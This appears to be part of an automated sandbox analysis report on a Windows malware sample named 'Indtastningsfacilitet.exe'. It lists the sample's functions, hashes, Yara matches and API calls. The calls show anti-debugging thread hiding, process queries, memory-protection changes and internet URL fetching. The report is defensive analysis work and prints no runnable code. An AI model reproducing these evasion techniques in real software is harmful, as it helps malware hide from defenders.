                              • Opcode Fuzzy Hash: 64b538f98a15a7b66f9e13adba0aec8f6fd2ddc537792962f6e1b7b6ef252922
                              • Instruction Fuzzy Hash: 3CB092B01502047EFA204A008C0AFB77B1AEB10700F200011BA0494094C6A21C20C524
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02145DFC, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                              Download Yara Rule
                              APIs
                              • GetLongPathNameW.KERNELBASE(?,021404EE,00000200,02141C61,?,?,?,?,0214523B,02145200,02141457,?,?,00000004,?,00000000), ref: 02145E0B
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: LongNamePath
                              • String ID:
                              • API String ID: 82841172-0
                              • Opcode ID: 05590cfd3447dced2ec1b2ca25b403dcd4ff7b455290660f6856e5da2b667189
                              • Instruction ID: 1e4b140cf606c8bf0029eb496e81cd6aedcab3da80029c5d0d48980e8bac0d85
                              • Opcode Fuzzy Hash: 05590cfd3447dced2ec1b2ca25b403dcd4ff7b455290660f6856e5da2b667189
                              • Instruction Fuzzy Hash: FBB09275204300BBE650DA10CDC8F5BB7A8BB98700F108804BACA86142C630A804CB21
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02143AFA, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02143B00
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              • Opcode ID: aecf66dd6198122d4e9adfa0709ac85ed8122ce87c6916bf1efd8e00f1959138
                              • Instruction ID: 9e87e462595a512a518c00a17d47155f09dbb2d9b480415b0af4131e7c6f82a4
                              • Opcode Fuzzy Hash: aecf66dd6198122d4e9adfa0709ac85ed8122ce87c6916bf1efd8e00f1959138
                              • Instruction Fuzzy Hash: 84A0113028008A22CAA00A203C0AB8823020B82238F300300203AA80E0C8A0828C8202
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Analysis Process: Indtastningsfacilitet.exe PID: 1340 Parent PID: 5412 Indtastningsfacilitet.exeCOMMON

                              Executed Functions

                              Function 005612DE, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 206nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0056074C), ref: 00560A4D
                              • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 00561321
                              Strings
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationMemoryProtectThreadVirtual
                              • String ID: W.E$1.!T$y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 675431017-3275326604
                              • Opcode ID: 0cac671cbe3958ead429a6caa088ff3c9c10bb3b2ad860396315021059ed22e4
                              • Instruction ID: 3c413646716c9ef5c7c5cc6aeb1ac6245076d7ee5e192733224979fdef002469
                              • Opcode Fuzzy Hash: 0cac671cbe3958ead429a6caa088ff3c9c10bb3b2ad860396315021059ed22e4
                              • Instruction Fuzzy Hash: 8A716672500305AFDB14CF20DE4EBA87B21FF69360F104364F9042F2EAD6B89842CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 005608B7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • EnumWindows.USER32(005608D9,?,00000000,?,?,?,0056074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 005608BF
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0056074C), ref: 00560A4D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: EnumInformationThreadWindows
                              • String ID: 1.!T
                              • API String ID: 1954852945-3147410236
                              • Opcode ID: d5fa75220e6e26fcf73d165fcd5f48852e771e5aae332a5a68a8537d932ab225
                              • Instruction ID: f29dbaae20c425d3c36150f17695fc1f93ea4ace1a178a40895676af6f9cbbbc
                              • Opcode Fuzzy Hash: d5fa75220e6e26fcf73d165fcd5f48852e771e5aae332a5a68a8537d932ab225
                              • Instruction Fuzzy Hash: 273178706403026BEB10EF70CC9ABEA3FA0BF95768F208218BD545B2C2CA74DC02CB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00568CF3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 125nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryInformationProcess.NTDLL(00000004), ref: 005693D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 00569110
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1778838933-2268763764
                              • Opcode ID: 3523c760a5c293950f461c77b6c2dbde9f12bdd629fa0cb1d798bbd4ff789be1
                              • Instruction ID: a899b1b7664c67e1056b200de8aaf7ce3ef8ecd08995899855928226b665b9b3
                              • Opcode Fuzzy Hash: 3523c760a5c293950f461c77b6c2dbde9f12bdd629fa0cb1d798bbd4ff789be1
                              • Instruction Fuzzy Hash: C951DF37505605DFCF18CF24E698B68BB2AFF69320F40936AD5141B2EDD7785882CB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00566DB9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 120COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 1.!T
                              • API String ID: 0-3147410236
                              • Opcode ID: 20157101dc6def3cc541a86f7fe679cdea8ae94032f08d1b36c925fb27a32281
                              • Instruction ID: dcf78a528d26dfb58f90ca6a5762d15b60f1c92cf89e9b9bce06dc0b5d2f84ee
                              • Opcode Fuzzy Hash: 20157101dc6def3cc541a86f7fe679cdea8ae94032f08d1b36c925fb27a32281
                              • Instruction Fuzzy Hash: BE41AB75A00316AFEF10DF64C985B9A7BA0BF88764F158128FD496B391C670ED41CB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00568DF2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryInformationProcess.NTDLL(00000004), ref: 005693D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 00569110
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1778838933-2268763764
                              • Opcode ID: 2f65443e4c7b8292aaa49a776df75d68b763a7b5664891620c7b10ad8fbf9ee6
                              • Instruction ID: 69f4f784941445cf7b06f083b00f55c2cd70df106563fec89a96faacc6b5a14a
                              • Opcode Fuzzy Hash: 2f65443e4c7b8292aaa49a776df75d68b763a7b5664891620c7b10ad8fbf9ee6
                              • Instruction Fuzzy Hash: FA51BA37505605DFCF18CF24E6A8B68BB2AFF69320F00976AD1140B2EDD6785982CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 005608EF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 115nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0056074C), ref: 00560A4D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: 15f0d1c0a0df6ad0eff6d6172d1952f6bf21a77d5ab09167a7dba756baa44407
                              • Instruction ID: 10ad13f9dc909477086daaf7b655145d16ef5d547b3af522c2595a0124d60aff
                              • Opcode Fuzzy Hash: 15f0d1c0a0df6ad0eff6d6172d1952f6bf21a77d5ab09167a7dba756baa44407
                              • Instruction Fuzzy Hash: D4410477500316AFCA48CF24EA9EF18BB15FFA9360F008355E6142F2EDD6B459428F95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00568F0D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryInformationProcess.NTDLL(00000004), ref: 005693D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 00569110
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1778838933-2268763764
                              • Opcode ID: 0169d66fd928d0876fc0caffb4e804adca6fd3da98d23dd1379462cd8b665cd3
                              • Instruction ID: 626b35e84c7816701acef4cae1910b79549bbb0ec7997fbe357e21977b0123df
                              • Opcode Fuzzy Hash: 0169d66fd928d0876fc0caffb4e804adca6fd3da98d23dd1379462cd8b665cd3
                              • Instruction Fuzzy Hash: 8441AC33505605DFCF18CF24EAA9B68BB2AFF69360F00935AD1141B2EDD7785982CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00569012, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryInformationProcess.NTDLL(00000004), ref: 005693D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 00569110
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1778838933-2268763764
                              • Opcode ID: 02441f77ef0c01e9454345f809c156dc706a0b6efd0a448e091951d7fdcfa906
                              • Instruction ID: fabdbb33dd26c5636d8354eb7e0a6cf1af948ba86d3c173f929e139e73460361
                              • Opcode Fuzzy Hash: 02441f77ef0c01e9454345f809c156dc706a0b6efd0a448e091951d7fdcfa906
                              • Instruction Fuzzy Hash: 8541A937505609DFCF18CF24E699B68BB2AFF69320F00935AD1141F2EDD6785982CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 005670B8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0056074C), ref: 00560A4D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: 422e4b865983cf80190ca511d1ea269efe919bba7deb6b17335d1bdbf97eb727
                              • Instruction ID: 88a8ed6113478ed7a0241bb56121b4510bf64664752745d5a1e80b44dc1851fd
                              • Opcode Fuzzy Hash: 422e4b865983cf80190ca511d1ea269efe919bba7deb6b17335d1bdbf97eb727
                              • Instruction Fuzzy Hash: A0212970740305AEFF109E608C99BEA3FA1FF49768F604129FE451B2D1D6B5DC42CA41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00568CE9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryInformationProcess.NTDLL(00000004), ref: 005693D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 00569110
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1778838933-2268763764
                              • Opcode ID: 935b397d3c465e875a6cd4ac6df497da5e70b392ebd4587b6f8eef49c2e7e564
                              • Instruction ID: b9861291e0e1e81f409ccd466e6b40df4ff196bdf395ce145f4bd521fff20e8b
                              • Opcode Fuzzy Hash: 935b397d3c465e875a6cd4ac6df497da5e70b392ebd4587b6f8eef49c2e7e564
                              • Instruction Fuzzy Hash: EB31F931704205CEEF299E24C5987BC3F6ABF65318FA95A6FC9468B2D5C33488C4C741
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00567088, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0056074C), ref: 00560A4D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: abdac5ac15c88742f8fb1516a417ddd47e5346fb259b23d0cfd0c5117cadf4f5
                              • Instruction ID: cce887d98398a79ea7cb92bfdc68a94171836a634a4dbc622a1ab6cbb0c58529
                              • Opcode Fuzzy Hash: abdac5ac15c88742f8fb1516a417ddd47e5346fb259b23d0cfd0c5117cadf4f5
                              • Instruction Fuzzy Hash: 502127B0740306ABFF109F648C8ABDA7FA1BF85768F244210BE542B2C1C6B4DC01CB44
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056911A, Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryInformationProcess.NTDLL(00000004), ref: 005693D6
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID:
                              • API String ID: 1778838933-0
                              • Opcode ID: 54a94929fee6eadf382035450c646e60fb2376eadaf4714c376d2dd3816b245c
                              • Instruction ID: 147c4664dece1ed45563ef1f1059a0514da08ebf4e7729e00354ee891242ae0d
                              • Opcode Fuzzy Hash: 54a94929fee6eadf382035450c646e60fb2376eadaf4714c376d2dd3816b245c
                              • Instruction Fuzzy Hash: 0B41AB33505605DFCF18CF24EA98B68BB29FF6A320F04935AD1141F2EDD6785982CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 005692AE, Relevance: 1.6, APIs: 1, Instructions: 65nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryInformationProcess.NTDLL(00000004), ref: 005693D6
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID:
                              • API String ID: 1778838933-0
                              • Opcode ID: 7a6503a073fbe0e6be4388ce8c19de922eee8f5dd3025e9c3dedeac10cfd2441
                              • Instruction ID: e800fc2805cab09a815f96ffe5f849df3ac874ba31454b77be498a9a2c379686
                              • Opcode Fuzzy Hash: 7a6503a073fbe0e6be4388ce8c19de922eee8f5dd3025e9c3dedeac10cfd2441
                              • Instruction Fuzzy Hash: 8D319977415516DF8A4CCF24E69D828BB2AFFAA370300935AD2141F2FDD67419828F95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 005687FD, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,005682E2,00000040,00560A2A,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00568816
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                              • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                              • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                              • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00562A8A, Relevance: 1.3, APIs: 1, Instructions: 93sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNELBASE(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_00009402,00000000,00000000,00000000), ref: 00562BFB
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 3060c686fb8b5ef760e5da26d33bdd6dc90f1367763eb0ef4c40ee84fe2aafef
                              • Instruction ID: 1874ed5d3f2c9c5881b2794349eee4de3525db55c8681f50762b5f712a3adfef
                              • Opcode Fuzzy Hash: 3060c686fb8b5ef760e5da26d33bdd6dc90f1367763eb0ef4c40ee84fe2aafef
                              • Instruction Fuzzy Hash: 2E312170640742AFF720AF28CC8DFA9BBA1BF04701F218159F945AB1E2D7B4DD80CA51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 005645DC, Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                              Download Yara Rule
                              APIs
                              • InternetOpenA.WININET(00564E47,00000000,00000000,00000000,00000000,0056501A,00565374,55E47D79,55E47D79,55E47D79,55E47D79), ref: 005645EA
                              • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564752
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InternetOpen
                              • String ID:
                              • API String ID: 2038078732-0
                              • Opcode ID: 7eb4d8baa9c9647d97d9a8840cae98320c6f65a49904926dd48686f333ef394d
                              • Instruction ID: 3b2b75795d3e54b8db2a0230f0e51d1f3fcd3e2f1be99142dfe95f769df608e0
                              • Opcode Fuzzy Hash: 7eb4d8baa9c9647d97d9a8840cae98320c6f65a49904926dd48686f333ef394d
                              • Instruction Fuzzy Hash: D8312D3028438AABEF319E54CD45FEE3A65FF00740F508425BE4AAF590DB719A40EB24
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056449E, Relevance: 1.6, APIs: 1, Instructions: 146libraryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 005645DC: InternetOpenA.WININET(00564E47,00000000,00000000,00000000,00000000,0056501A,00565374,55E47D79,55E47D79,55E47D79,55E47D79), ref: 005645EA
                                • Part of subcall function 005645DC: InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564752
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 00564FA8
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InternetOpen$InitializeThunk
                              • String ID:
                              • API String ID: 518753361-0
                              • Opcode ID: f2f0189025fa37cabbf206bff69a8d6caf283628d09ae8224167706ad55fcc67
                              • Instruction ID: 8dfe74c09177e5dc9e3101055d0685aece9f3035d70de0cc37f7b3baa3e0a001
                              • Opcode Fuzzy Hash: f2f0189025fa37cabbf206bff69a8d6caf283628d09ae8224167706ad55fcc67
                              • Instruction Fuzzy Hash: D9619C77419616DFC648CF24EA6E814BB26FFAA3A0300D399D1141F1FED67419428FD6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00564450, Relevance: 1.6, APIs: 1, Instructions: 119libraryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 005645DC: InternetOpenA.WININET(00564E47,00000000,00000000,00000000,00000000,0056501A,00565374,55E47D79,55E47D79,55E47D79,55E47D79), ref: 005645EA
                                • Part of subcall function 005645DC: InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564752
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 00564FA8
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InternetOpen$InitializeThunk
                              • String ID:
                              • API String ID: 518753361-0
                              • Opcode ID: f7f833193467ea9ef123d8a0cfa1f263a4e6d422b32ead279d86ec8b8db281ea
                              • Instruction ID: 8208ff7dd20a83770cffdae27d44fd8e7b379f2d821df8b877a03b72fddaedb1
                              • Opcode Fuzzy Hash: f7f833193467ea9ef123d8a0cfa1f263a4e6d422b32ead279d86ec8b8db281ea
                              • Instruction Fuzzy Hash: 9A51F377409656DFC718CF24E669A98BF22FFAA360F008399D0441F2EED6701942CF96
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00564406, Relevance: 1.6, APIs: 1, Instructions: 108libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 00564FA8
                                • Part of subcall function 005645DC: InternetOpenA.WININET(00564E47,00000000,00000000,00000000,00000000,0056501A,00565374,55E47D79,55E47D79,55E47D79,55E47D79), ref: 005645EA
                                • Part of subcall function 005645DC: InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564752
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InternetOpen$InitializeThunk
                              • String ID:
                              • API String ID: 518753361-0
                              • Opcode ID: fddf752f6fac41f854aabf7f5c35933fbc515557f502978a995c0fb51abcbe90
                              • Instruction ID: 1b934c0b70e6e86419ebfd7f7e278d63feb3bf76412c0ea90b39b5ddf0faca14
                              • Opcode Fuzzy Hash: fddf752f6fac41f854aabf7f5c35933fbc515557f502978a995c0fb51abcbe90
                              • Instruction Fuzzy Hash: D5410C7741A6569FCB08CF24E66AA14BF25FF6A360B008399D0500F1FED6B41902CFD6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00564D2A, Relevance: 1.6, APIs: 1, Instructions: 101libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 00564FA8
                                • Part of subcall function 005645DC: InternetOpenA.WININET(00564E47,00000000,00000000,00000000,00000000,0056501A,00565374,55E47D79,55E47D79,55E47D79,55E47D79), ref: 005645EA
                                • Part of subcall function 005645DC: InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564752
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InternetOpen$InitializeThunk
                              • String ID:
                              • API String ID: 518753361-0
                              • Opcode ID: ceaf8f5692e68e7cf8b78d5204c188e76f4a515d6d0c064af426f8a36432c51b
                              • Instruction ID: 853d572aefca58a9d0ab8203c7c3c8ea74f4ab332b264ad432c2910fda602d3f
                              • Opcode Fuzzy Hash: ceaf8f5692e68e7cf8b78d5204c188e76f4a515d6d0c064af426f8a36432c51b
                              • Instruction Fuzzy Hash: 7841CE7742A6659F8B48CF24E6AA814BF25FF6A3603009399D0501F1FED5741942CFDA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056463A, Relevance: 1.6, APIs: 1, Instructions: 83networkCOMMON
                              Download Yara Rule
                              APIs
                              • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564752
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InternetOpen
                              • String ID:
                              • API String ID: 2038078732-0
                              • Opcode ID: 26771013d71bfc1e64ab6595a9daf2c4abf53f988e54993aaa50c47a6dc73f48
                              • Instruction ID: 6edbfd7bfae373e83c966bb2eac37113a31bfeff0a983d143313b2e70457a97f
                              • Opcode Fuzzy Hash: 26771013d71bfc1e64ab6595a9daf2c4abf53f988e54993aaa50c47a6dc73f48
                              • Instruction Fuzzy Hash: 77418E7700420AEFCA68CF14EE59F68BB15FF69360F008325E6181F1EDD6741A428FA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00564449, Relevance: 1.6, APIs: 1, Instructions: 59libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 00564FA8
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 3b9be34567b547a335d942730c1fed9570389221b9a72a035870ecd8675f822d
                              • Instruction ID: c576a414768497106133bb4933485afe09cf04fce8b6d4595a1c9d22fb9e6919
                              • Opcode Fuzzy Hash: 3b9be34567b547a335d942730c1fed9570389221b9a72a035870ecd8675f822d
                              • Instruction Fuzzy Hash: 8B21C97B4156169F8648CF24E65E814BB25FFAA370300D396D1141F2FED9742A438FE6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00566D52, Relevance: 1.5, APIs: 1, Instructions: 11libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNELBASE(00564FFA,?,?,0056074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00566D98
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 1390f1346411d48d0962306dc8f17f58410a50f9e9f03bff120d879f12c8c39e
                              • Instruction ID: 93585f49d412f43472199d6014b15065ccd98d2cb6b2c3e1a4615119a01c5c94
                              • Opcode Fuzzy Hash: 1390f1346411d48d0962306dc8f17f58410a50f9e9f03bff120d879f12c8c39e
                              • Instruction Fuzzy Hash: 27C08CA0821000BA99391AB0082CC3F0C28AED5720F005E0CB827A3180456088008272
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056709C, Relevance: 1.5, APIs: 1, Instructions: 10libraryCOMMON
                              Download Yara Rule
                              APIs
